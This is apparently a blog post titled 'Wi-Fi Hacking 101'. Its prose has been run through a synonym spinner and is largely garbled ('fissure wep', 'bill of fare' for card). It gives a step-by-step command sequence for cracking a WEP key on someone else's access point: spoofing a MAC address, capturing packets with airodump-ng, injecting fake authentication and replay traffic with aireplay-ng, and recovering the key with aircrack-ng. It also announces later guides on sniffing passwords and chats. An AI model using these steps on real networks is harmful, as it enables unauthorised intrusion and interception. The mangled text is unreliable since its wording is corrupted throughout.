-->

Wi-Fi Hacking 101

Wi-Fi Hacking 101

WiFi Hacking 101
O.K folks, inwards this tut i am going to demo you lot how to fissure wep, Sniff non ssl & to a greater extent than or less ssl passwords over a wireless network & sniffing msn chats

Part. 1, Cracking WEP

my means of groovy wep is a niggling dissimilar than other ways but it gets the chore done quicker than everyone else's way

so you lot volition remove backtrack iii in addition to a supported wifi bill of fare that tin become into monitor fashion (i create got a ranlink 2500 bill of fare (ra0) )

open upward a shell

ok therefore 1st nosotros remove to halt our wireless bill of fare therefore nosotros create the airmon command

airmon-ng halt [wifi bill of fare extension e.g ath0]

now lets alter our mac address

macchanger --mac 00:11:22:33:44:55 [wifi bill of fare extension]

now lets burn our bill of fare upward inwards monitor mode

airmon-ng start [wifi bill of fare extension]

now nosotros remove the mac address of the AP nosotros are hacking therefore lets do

airodump-ng [wifi bill of fare extension] directly you lot volition encounter your AP. Take banknote of the mac address/ BSSID in addition to the channel, directly hitting CTRL+C to halt airodump jumping channels or you lot volition come upward into problems after on.

now lets start capturing the information packets nosotros remove for the hack therefore type

airodump-ng -c [channel] -b [bssid/ mac addres of AP] -w [filename] [wifi bill of fare extension] therefore for example

airodump-ng -c 1 -b 01:1b:11:78:d9:f2 -w linksys ra0

once you lot create got done that ascendency you lot should encounter to a greater extent than or less information come upward up clients, mac address, channel, information ect directly you lot should encounter the information filling upward nosotros remove the information to larn to virtually 10-15 thousand to fissure the fundamental therefore nosotros remove to speed it upward nosotros larn a lot of information inwards a brusque infinite of time.

we are directly going to role aireplay therefore opened upward up to a greater extent than or less other musical rhythm in addition to type aireplay-ng -1 -0 -a [AP mac address/ bssid] -h [faked mac address] [wifi bill of fare extension] for example

aireplay-ng -1 0 -a 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

now in 1 lawsuit you lot encounter authentication successful decease on to replay a information parcel to the access indicate which volition forcefulness it to post out lots of packets nosotros tin role to fissure the fundamental therefore do,

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap mac address/ bssid] -h [faked mac address] [wifi bill of fare extension] for example

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

now aireplay volition start reading the packets in addition to in 1 lawsuit it finds 1 you lot tin role for the hack it volition prompt you lot to role that packet? simply hitting y in addition to therefore last into directly on the airodump musical rhythm you lot volition encounter the information filling upward real fast ance it gets to 10,000 run this command:

aircrack-ng -b [mac address/ bssid] [file cite you lot used before +-01.cap] for example

aircrack-ng -b 02:1b:11:78:d9:f2 linksys-01.cap

and aircrack volition start decrypting the packets/ IV's in addition to uncovering the wep key!

if this is your get-go fourth dimension doing wep groovy it should accept virtually 10-20 mins at get-go in addition to you lot volition start progressing to eight mins, v mins, iii mins ect

other tuts to follow! [[its 03:45am inwards the uk :O]]

thanks for reading!!
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser